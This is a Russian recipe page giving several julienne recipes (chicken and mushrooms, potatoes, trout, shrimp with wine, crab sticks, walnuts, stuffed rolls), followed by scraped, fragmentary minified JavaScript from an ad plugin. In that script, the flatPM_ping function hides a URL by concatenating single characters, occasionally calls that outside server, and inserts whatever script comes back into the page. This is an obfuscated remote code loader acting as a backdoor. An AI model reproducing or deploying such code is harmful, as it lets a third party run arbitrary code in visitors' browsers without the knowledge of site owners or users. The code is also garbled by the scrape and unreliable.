Жульен по-домашнему рецепт

Жульен по-домашнему рецепт

Ингредиенты

ИНГРИДИЕНТЫ МАССА КАЛОРИЙНОСТЬ (ккал. на 100 гр.)
Картофель 700 г. 77
Куриного филе 400 г. 110
Шампиньоны 300 г. 27
Сыр 250-300 г. 402
Лук репчатый 3 шт. 40
Молоко 200 мл. 42
Приправа к картофелю по вкусу
Черный перец по вкусу
Соль по вкусу

Пошаговый рецепт приготовления Жульен по-домашнему с фото

А готовится кушанье так:

    Почистите картошку, помойте, нарежьте мелкими кусочками.

Посолите, поперчите картофельный слой, посыпьте приправой.

Очистите шелуху с лука, нарежьте кубиками, отправьте обжариваться лук до золотистости.

Как только продукты станут мягкими, влейте сюда же молоко, сделайте слабый огонь, тушите массу еще две минуты.

Теперь картофель, мясо на противне залейте подливой, посыпьте потертым сыром, накройте отрезом фольги.

Видеорецепт Жульен по-домашнему

Жульен в духовке с картошкой

А еще жульен в духовке с картошкой можно приготовить по другому рецепту. Готовится блюдо просто, быстро, поэтому не нужны специальные кулинарные навыки!

Итак, для того чтобы приготовить блюдо по этому рецепту вам понадобится:

Ингредиенты:
свежие грибы – 0,5 кг;
картошка – 10 шт.;
лук – 3 шт.;
сливки – 250 мл;
молоко – 100 мл;
сыр – 250 г;
мука – 2 ст.л.;
соль, приправа, перец.

А готовится кушанье так:

    Сразу очистите с лука шелуху, нарежьте лук кубиками.

Раскалите сковородку с маслом, отправьте обжариваться луковые кубики.

Помойте грибы, нарежьте небольшими кусочками, отправьте в сковородку с луком, перемешайте, посолите, поперчите, жарьте вместе 20 минут.

Далее сюда же влейте молоко со сливками, смешайте, посыпьте мукой, снова помешайте, томите 7 минут.

Почистите картофель, помойте, нарежьте кубиками, отправьте обжариваться картофельные кубики до полной готовности, обязательно посыпьте приправой.

  • Теперь вам понадобится форма или противень, первым слоем выкладывайте обжаренный картофель, потом луково – грибную массу, посыпьте все потертым сыром, отправьте в предварительно прогретый до 180 градусов духовой шкаф на 15 минут. Вот и все, горячий, сытный обед готов!
  • 4 РЕЦЕПТА ЖУЛЬЕНА И СЕКРЕТЫ ПРИГОТОВЛЕНИЯ

    Жульен способен украсить любой, даже самый изысканный стол, а будничный ужин сделать и вовсе незабываемым. Приготовить его просто, конечно, если знать некоторые секреты и тонкости, о них мы вам и расскажем.

    Жульеном принято называть горячую закуску из овощей, грибов или морепродуктов, которые запекают в белом соусе бешамель, сметане или сливках.

    Пожалуй, самый главный секрет приготовления вкуснейшего жульена состоит в нарезке ингредиентов. Так, овощи нарезают кольцами или тонкой соломкой, грибы – кубиками или соломкой, мясные продукты и копчености – соломкой или также небольшими кубиками.

    Мясные продукты, которые будут использованы для приготовления жульена, нужно предварительно приготовить.

    Морепродукты, которые пойдут в жульен, должны быть сырыми. Их бланшируют пару минут в подсоленной кипящей воде, откидывают на дуршлаг и затем обсушивают на салфетке или полотенце. Если для приготовления жульена вы будете использовать отваренные мороженые морепродукты, их нужно предварительно разморозить.

    Грибы нужно заранее отварить и затем обжарить с луком, картофель в блюдо лучше не добавлять.

    Самый главный секрет нежнейшего жульена состоит в использовании сливочного, сметанного или соуса бешамель, именно он и придает блюду неповторимый сливочный вкус и нежную консистенцию. Важно: соусом заливают ингредиенты сразу же после их обжаривания или тогда, когда вы переложили ингредиенты в формочки, при этом соус должен быть теплым.

    Жульен рекомендуется присыпать сыром. Что касается сорта, лучше выбирать легко плавящиеся сорта сыра – это сыр гауда, грюйер, эмменталь. Чтобы сыр не крошился во время натирания на терке, его можно ненадолго положить в морозильную камеру. У жульена будет очень красивая хрустящая корочка, если вы перемешаете сыр с молотыми сухарями.

    Разложите все ингредиенты по кокотницам (формочки для приготовления жульена), заполнить их нужно где-то на три четверти, полейте сверху соусом, присыпьте блюдо сыром и поставьте кокотницу в духовой шкаф запекаться. Приблизительное время приготовления – 15-20 минут.

    Если у вас нет специальной формы для жульена, кокотницы, вы можете готовить его в керамическом горшочке, форме для запекания или небольшой сковороде.

    Итак, чтобы приготовить классический жульен, нарежьте кольцами или соломкой лук, обжарьте его на растительном масле, добавьте к луку нарезанные грибы,все ингредиенты обжарьте, посолите и поперчите. Нарежьте мясо вареной курицы, переложите его к грибам и луку. Приготовьте соус: на отдельной сковороде поджарьте муку, добавьте сливочное масло, посолите и поперчите, помешивая, введите сметану, бульон или сливки, проварите до загустения соуса. Выложите все ингредиенты в формочки, залейте соусом, присыпьте сыром. Запекайте в духовке около 20 минут.

    Классический жульен

    Продукты:
    1. Свежие грибы – 300 гр.
    3. 2. Молоко – 500 мл.
    4. Твердый сыр – 200 гр.
    5. Лук репчатый – 1 шт.
    6. Сливочное масло – 60 гр.
    7. Лимон – 1 шт.
    8. Мука – 2 ст. ложки
    9. Специи – по вкусу.
    Как приготовить классический жульен:
    На первом этапе приготовления жульена необходимо: почистить лук, порезать его соломкой и поджарить на сковороде в сливочном масле. Грибы промыть, обсушить и порезать большими, но тонкими кусочками, выложить в небольшую кастрюлю. Добавить прожаренный лук, сок из половины лимона, специи (но не солить!), накрыть крышкой и хорошенько потушить все вместе. Пока тушатся грибы, готовим белый соус. Для этого 30 грамм масла сливочного необходимо растопить в посуде с толстым дном, добавить 2 ложки муки. Желательно, чтобы мука была белой и тонкого помола. К маслу и муке необходимо тонкой струйкой влить половину литра молока, все время размешивая муку, чтобы не образовалось комков. Убавить огонь и оставить кипеть полчаса минимум. В самом конце к соусу можно добавить немного мускатного ореха.

    Разложить грибы с луком в специальные формочки для жюльена, называемые кокотницами (желательно керамические), всыпать часть натертого на крупной терке сыра и немножко перемешать. Сверху залить массу соусом и посыпать остатками сыра. Дальше жюльен в формах необходимо отправить в разогретую до 180 духовку и запекать около 15 минут при той же температуре до образования золотистой корки. Затем блюдо можно вынимать и подавать к столу (жюльен подается исключительно горячим!).

    Жульен из красной рыбы

    Продукты:
    1. Форель – 300 гр.
    2. Лук репчатый – 2 шт.
    3. Сливки – 150 мл.
    4. Мука – 1 ст. ложки
    5. Твердый сыр – 150 гр.
    6. Масло растительное
    7. Зелень укропа
    8. Молотый черный перец, соль — по вкусу.
    Как приготовить жульен из красной рыбы:
    Ополоснуть водой рыбное филе, обсушить его и нарезать кубиками среднего размера. На терке натереть сыр. Лук почистить и нарезать его четвертью кольца. Растительное масло (может быть и топленое) разогреть в сковороде, добавить лук, посолить и посыпать его черным перцем (желательно свежемолотым). Подержать лук на сковороде до того момента, пока он не станет мягким (но ни в коем случае не пережарить!). Выложить на сковороду к луку кубики филе, перемешать и обжарить форель на протяжении одной-двух минут. Затем добавить муку и еще раз перемешать.

    На следующем этапе необходимо добавить к луку и рыбе сливки (ровно столько, чтобы соус стал не слишком густым, но и не жидким), помешивая содержимое в сковороде. При этом необходимо помнить, что если сливки слишком жирные, то муку добавлять не обязательно. В противном случае (когда сливки нежирные) соус может и не загустеть. Добавить к соусу и рыбе перца и соли по вкусу, после чего хорошенько перемешать. Образованную массу разложить в керамические (или любые другие) кокотницы для жюльена, посыпав сверху тертым сыром. Если таковых нет под рукой, можно использовать булочки, из которых необходимо вынуть мякиш. Перед подачей на стол жюльен из красной рыбы необходимо запекать около семи минут в духовке, разогретой до 180°, пока сыр полностью не расплавиться. Затем посыпать свежей зеленью укропа, и подавать к столу в кокотницах вместе с белым хлебом.

    Жульен по-французски с белым вином и креветками

    Продукты:

    1. Очищенные креветки — 200 гр.
    2. Репчатый лук — 100 гр.
    3. Белое вино — 80 мл.
    4. Молоко — 80 мл.
    5. Сливочное масло — 70 гр.
    6. Твердый сыр — 50 гр.
    7. Мука — 40 гр.
    8. Лимонный сок — 1 ст. ложка
    9. Карри 1 ч. ложка
    10. Мускатный орех
    11. Перец
    12. Соль
    Как приготовить жульен по-французски с белым вином и креветками:

    Луковицу очистить и мелко нарезать, посыпать карри и обжарить в разогретом масле, положить очищенные креветки, сбрызнутые лимонным соком и перемешать.
    На другой сковороде отдельно обжарить на сливочном масле муку и тонкой струйкой влить молоко и белое вино, добавить соль, перец и мускатный орех.
    Смешать креветки с соусом и разложить в кокотницы или горшочки, сверху посыпать тертым сыром и запечь в течение 5 минут.
    Жюльен по-французски подавать в кокотницах с белым вином.

    Жульен с курицей и грибами

    Продукты:
    1. Куриное филе — 500 гр.
    2. Шампиньоны замороженные (свежие) — 300 гр.
    3. Репчатый лук — 1 — 2 шт.
    4. Сыр — 200 гр.
    5. Сметана — 300 — 350 гр.
    6. Черный молотый перец — по вкусу
    7. Соль — по вкусу
    8. Мука — 1 — 2 ст. ложки
    9. Растительное масло — для жарки

    Как приготовить жульен с курицей и грибами:

    Филе помыть. Залить водой, довести до кипения. Сварить куриное филе до готовности минут 30 на медленном огне. Помыть и почистить лук, порезать полукольцами. Разморозить грибы. Нагреть сковороду, налить 30 г растительного масла. Обжарить лук и грибы, помешивая, 10-15 минут.

    Куриное филе остудить, мелко нарезать.
    Теперь включить духовку, пусть нагреется до 180 градусов. В сковороду к грибам добавить нарезанное филе.

    На отдельной сухой сковороде обжарить муку. Влить сметану, добавить соль и перец. Нагреть до кипения.

    Переложить сливочный соус к грибам с курицей. Хорошо перемешать и снять с огня.

    Грибную массу разложить в кокотницы или горшочки. Твердый сыр натереть на крупную терку.

    Грибы с курицей посыпать тертым сыром и поставить в нагретую духовку. Готовить жульен с курицей и грибами около 30 минут на средней полке, до золотистости сыра. Куриный жульен с грибами готов. Сразу подать на стол.

    Жульен с курицей и грибами по классическому рецепту

    Под интригующим названием жульен с курицей и грибами скрывается изысканное и весьма популярное среди европейцев блюдо, имеющее французские корни. Его традиционно выпекают в специальных металлических чашах конического вида с удлиненной ручкой, высотой до 50 мм и диаметром до 70 мм – кокотницах.
    В русской кухне используют небольшие керамические или глиняные емкости для запекания, превосходно удерживающие жар и полностью сохраняющие полезные свойства продуктов.

    Горячая закуска с курицей и грибами украсит и праздничный стол, и семейную трапезу. А приготовить ее можно в духовке, в мультиварке или на сковороде. Причем, если отсутствуют специальные металлические или керамические формочки, жульен можно запечь в тарталетках, корзиночках или в круглых пышных булочках, предварительно вынув из них мякиш.

    В классический рецепт этого блюда входят грибы, белый соус и сыр. Но вариантов приготовления этого блюда существует множество. Под расплавленным сыром можно запечь нежное филе курицы или индейки, морепродукты или утиные язычки. А деликатесный белый соус сделать на основе сметаны или сливок, либо приготовить соус бешамель из цельного молока с добавлением муки.

    Не менее разнообразен и выбор грибов. В сезон используют белые, лисички, грузди, подосиновики и т.д., предварительно отваренные в подсоленной воде. А в остальное время года – вешенки, шампиньоны, зимние опята, шиитаке, кольцевики, выращенные в домашних условиях.

    Вкус жульена зависит и от выбранного вида сыров (с плесенью, сычужный, молодой, сливочный, острый, твердый, мягкий, плавленый, колбасный, брынза и пр.)

    Одним словом — экспериментируйте, пробуйте разные варианты и, возможно, найдете для себя самый лучший рецепт, который станет для вас любимым.

    Как приготовить жульен с курицей и грибами в духовке

    Жульен с курицей и грибами, приготовленный в домашних условиях, наиболее популярен среди наших хозяек. Нежное куриное филе, в сочетании с сочными шампиньонами и белым соусом, приобретает особенный вкус. А «шапочка» из расплавленного сыра сохраняет неповторимый аромат этого блюда.

    Ингредиенты:

    • филе куриное — 300 г.
    • шампиньоны свежие — 300 г.
    • сливки — 200 мл.
    • сливочное масло — 20 г.
    • твердый сыр — 80 г.
    • мука — 1 ст.л.
    • растительное масло — 2-3 ст.л.
    • соль — 1/2 ч.л.
    • луковица — 1 шт.
    • перец молотый — щепотка,
    • мускатный орех — 1/2 ч.л.

    Приготовление:

    Шаг 1. Традиционно подготовим все продукты, отмерив и взвесив ингредиенты в соответствии с предоставленной рецептурой. Обязательно заранее (это очень удобно) помоем и почистим грибы, ополоснем тщательным образом куриную мякоть. Очистим луковицу.

    Прежде, чем запечем жульен в духовке — сначала приготовим на сковороде его основу.

    Шаг 2. Порежем филе кусочками среднего размера.

    Шаг 3. Обжарим их сразу же на раскаленной сковороде в минимальном (1 ст.л.) количестве растительного масла так, чтобы была явно заметна золотистая корочка со всех сторон.

    Готовые кусочки филе выложим в миску, предварительно удалив излишки масла с помощью сита или бумажного полотенца.

    Шаг 4. Мелкими кубиками порубим луковицу.

    Шаг 5. Обжарим его до мягкости и легкой румяности в небольшом количестве масла.

    Шаг 6. Тонкими пластинами нашинкуем грибы. Именно такими, как показано на фото.

    Изначально определение жульен (или жюльен) среди французских поваров обозначало особый способ нарезки ингредиентов, имея в виду, что тонкие фракции готовятся максимально быстро и придают им нежную консистенцию.

    Шаг 7. Максимально увеличив интенсивность огня, активно перемешивая, обжарим шампиньоны до появления слегка заметного румянца.

    Многие хозяйки стараются использовать в блюдах разнообразные специи. Однако опытные повара знают, что даже несколько лишних кристаллов ароматного порошка любой приправы могут испортить вкус готовой пищи. А потому:

    Не стоит увлекаться приправами и пряностями при изготовлении грибных блюд, в том числе и жульена, так как грибы сами по себе имеют выраженный и характерный вкус и сами могут выступать в роли специи.

    Шаг 8. Тонкой (по возможности) соломкой порежем остывшие кусочки куриного филе.

    Шаг 9. Важный этап процесса — это приготовление соуса для жульена.
    Чистую сухую сковороду хорошенько разогреем. Высыплем муку и будем интенсивно мешать лопаткой до появления слегка кремового колера.

    Шаг 10. В середину кинем кусочек масла — он мгновенно запузырится и начнет плавиться. Не менее интенсивно продолжим работать лопаткой/деревянной ложкой: все качественно перемешаем.

    Шаг 11. Зальем сливки. Продолжим мешать уже венчиком, чтобы полностью разбить все мучные комочки. В этот момент добавим все специи, соль. Соус мгновенно начнет густеть — это правильно.

    Шаг 12. В загустевший соус выложим куриную соломку, грибы и лук. Все хорошенько перемешаем до их равномерного распределения.

    Все хорошенько перемешаем до их равномерного распределения.

    Жульен с курицей и грибами на сковороде готов

    Осталось оформить блюдо и запечь жульен в духовке.

    Шаг 13. Для этого готовую массу разложим по глиняным горшочкам или кокотницам.

    Шаг 14. Стружку сыра (ее натрем на крупном полотне терки) распределим поверх жульена — это будет последний штрих.

    Шаг 15. Так как кокотницы у нас глиняные, то поставим мы их в холодную духовку!, и только после этого включим нагрев.

    Дождемся, когда отметка термометра остановится на 180 градусах и будем запекать до появления сырной корочки примерно 15-20 минут.

    Жульен с курицей и грибами в горшочках готов

    Сервировать жульен следует прямо в горшочках или кокотницах. И не забудьте при подаче к столу украсить блюдо веточками свежего фенхеля или укропа, листьями фиолетового или зеленого базилика, побегами кориандра или петрушки, а также помидорами черри или половинками мелкоплодных томатов.

    Важный совет тем, кто будет подавать жульен с грибами и курицей на праздничный стол:

    Горячий жульен принято подавать гостям отдельными порциями сразу после холодных закусок, либо в перерыве — перед подачей основного блюда.

    Оцените это изысканное блюдо со всей строгостью придирчивого гурмана, а если понравится — поделитесь рецептом жульена с друзьями.

    Жульен в тарталетках с грибами и курицей

    Для более оригинальной подачи — жульен можно выложить в тарталетки, корзиночки или в маленькие булочки (предварительно вынув из них мякоть), после чего украсить сыром и запечь в духовке.

    Готовьте с удовольствием — кушайте с аппетитом. Приятных гастрономических впечатлений вам и вашим гостям!

    Как самостоятельно приготовить жульен в домашних условиях

    Французская кухня — это что-то изысканное, пикантное, выполненное из весьма доступных ингредиентов, но сочетающих определенный шарм. Одно из таких лакомств, приготовить которое в домашних условиях может каждый – это жульен с грибами. Блюдо отлично подойдет для праздничного ужина или завтрака.

    С грибами

    Рецепт жульена, в основе которого шампиньоны и крабовые палочки, порадует своим вкусом всех домочадцев. Его ингредиенты:

    • полкилограмма грибов;
    • упаковка крабовых палочек;
    • полчашки сливок 20% жирности;
    • пара столовых ложек сметаны;
    • пару ложек муки;
    • твердый сыр;
    • репчатый лук;
    • соль по вкусу.

    Как правильно приготовить жульен из шампиньонов, находясь в домашних условиях?

    Грибы пожарить на подсолнечном масле с добавлением репчатого лука.

    Важно: если применяются шампиньоны, то их не следует сильно жарить.

    Далее нужно поперчить и посолить их, добавить указанное количество муки. Для того чтобы приготовить жульен, необходима специальная посуда. Это могут быть глиняные горшочки или стеклянная форма.

    Обмазав форму для выпечки растительным маслом, переложить содержимое из сковородки, сверху уложить шар из крабовых палочек, нарезанных кружками или кубиками. Далее залить сливками, а под самым верхом емкости обмазать сметаной. Засыпать тертым сыром и сразу поставить в духовой шкаф. Выпекать нужно около трети часа. Когда корочка приобретет светло-коричневый окрас, значит жульен, выполненный в домашних условиях, готов.

    С картофелем

    Одним из самых простых и не затратных рецептов того, как приготовить жульен, считается следующий. В его состав входят такие компоненты:

    • отварной картофель;
    • грибы;
    • лук репчатый;
    • чеснок;
    • смесь растительного и сливочного масла;
    • плавленый сырок;
    • полутвердый сыр;
    • яйца;
    • специи;
    • мука.

    Сначала нужно заняться картофелем. Помыть и поставить варить до готовности. Пока предыдущий продукт готовится, нужно перейти к грибам. Им провести гигиеническую процедуру, затем нарезать и обжарить.

    Как только картофель сварился, поставить его остывать, а затем очистить от кожицы и нарезать кубиками. Репчатый лук мелко нашинковать и обжарить. Когда с этим делом закончено, необходимо приготовить соус.

    На сухую сковородку выложить муку и ее поджарить до приобретения ею кремового оттенка, добавить к ней сливочное масло, и подождать, когда масло начнет впитывать муку. После в содержимое долить воды и сразу интенсивно перемешать, доводя до однородной массы. Обязательно добавить туда же еще плавленый сырок и специи, продолжая соус еще кипятить. Немного смесь остудить и добавить туда еще яиц. Порубить чеснок и натереть твердый сыр на мелких зубьях терки.

    Взять глиняные горшки, на дно выложить куски картофеля, грибы, хорошо прожаренный лук и чеснок. После чего все залить приготовленным соусом. Верхнюю часть блюда посыпать натертым сыром. Готовится жульен с картошкой в домашних условиях около получаса при температуре 200 градусов. Получится очень вкусное, к тому же дешевое блюдо, не требующее больших затрат на покупку специальных ингредиентов.

    С курицей

    Стоит заметить, что жульен можно приготовить из самых разных продуктов, которые имеются дома. Достаточно распространенным вариантом этого блюда считается жульен с курицей. Чтобы его приготовить, можно взять в произвольных сочетаниях ингредиенты, которые складываются в сковороду, горшки или стеклянные формы для затекания. Этот рецепт предусматривает использование следующих составляющих:

    • половинка курицы;
    • небольшое количество свежих грибов;
    • кусочек мяса копченого;
    • две шутки лука репчатого;
    • сыр полутвердый;
    • полбанки маслин;
    • ложка сметаны;
    • специи и соль;
    • масло растительное.

    Как создать это ароматное и вкусное блюдо?

    Прежде всего, нужно отварить курицу. Затем ее вынуть и отделить мясо, аккуратно нарезать его кусочками.

    Важно: не следует выливать бульон – он еще пригодится.

    Грибы вымыть, очистить, нарезать ломтиками, репчатый лук измельчить соломкой. Копченое мясо нарезать на мелкие квадратики. Сыр измельчить на крупной терке.

    На сковородке обжарить лук до полуготовности. Туда же отправить грибы и жарить порядка 10 минут. Грибы нужно выпарить от лишней влаги. Добавить к ингредиентам отварное мясо птицы, копченое мясо, добавить соль и перец. Перемешать всю смесь и снять с плиты сковороду. Выложить содержимое в горшочки, сверху нужно добавить сметаны и маслин.

    Важно: когда жульен запекается в гусятнице, сразу можно укладывать сметану и маслины.

    Залить смесь горячим бульоном от курицы, который остался после варки птицы, на уровне маслин. Посыпать сыром и отправить в духовку на полчаса. Запекать жульен до образования красивой корочки, при этом крышку посуды нежелательно накрывать. Входящие в состав копченое мясо и маслины наделяют это блюдо пикантным и ярко выраженным вкусом.

    С орехами

    Когда семья намерена отмечать какое-то событие, хозяйка старается каждый раз побаловать своих домочадцев новыми вкусными рецептами, одним из которых может стать на этот раз жульен с грецкими орехами и пармезаном в йогурте.

    В принципе все продукты простые и доступные, из них вполне возможно приготовить праздничное блюдо. Его можно подавать к салату из овощей, картофельному пюре. Понадобятся продукты:

    • телятина;
    • шампиньоны;
    • лук репчатый;
    • йогурт натуральный;
    • пармезан;
    • укроп;
    • соль;
    • прованские травы;
    • грецкие орехи.

    Готовится этот рецепт быстро и просто. Грибы, лук и мясо, помыть, почистить и нарезать кусочками среднего размера. Мясо обжарить в сливочном и растительном масле. Добавить туда еще лук, и снова обжарить с мясом минут пять. Положить в состав еще грибы и на среднем огне продолжать обжаривать около 10 минут. Посолить и не забыть внести к смеси прованские травы.

    Далее влить натуральный йогурт, сразу перемешать и убрать с огня. Соединить измельченный сыр, натертый на крупной терке, пармезан и грецкие орехи, которые также нужно заранее измельчить. Этой смесью посыпать грибы с мясом. На несколько минут поставить в предварительно разогретый духовой шкаф. Температура там должна быть не ниже 220 градусов. Подавать к столу в горячем виде, обязательно посыпав свежими листиками укропа. Натуральный йогурт, входящий в этот рецепт, деликатно подчеркивает изысканный вкус сливочного блюда.

    В булочке

    Достаточно интересным блюдом может стать жульен в булочке. На 4 порции понадобятся следующие ингредиенты:

    • булочки;
    • отварной куриный окорок или грудка;
    • лук репчатый;
    • мука столовая;
    • сметана;
    • сыр;
    • соль и специи.

    Помытый и очищенный лук режется тонкими полукольцами и отправляется на горячую сковороду с растительным маслом. Тушить продукт на маленьком огне до момента набирания им мягкости и прозрачности. Добавить туда муки, размешать и снять с огня.

    Отварной окорок разобрать на волокна или мелкие полоски. Перемешать мясо с обжаренным луком и сметаной. Взять булочку и срезать ее верхушку, вынуть середину, оставляя стенки толщиной примерно 1 см. Нафаршировать ее приготовленной начинкой, посыпать тертым сыром. Поставить блюдо запекаться до момента расплавления твердого сыра. Можно вынимать и угощаться.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};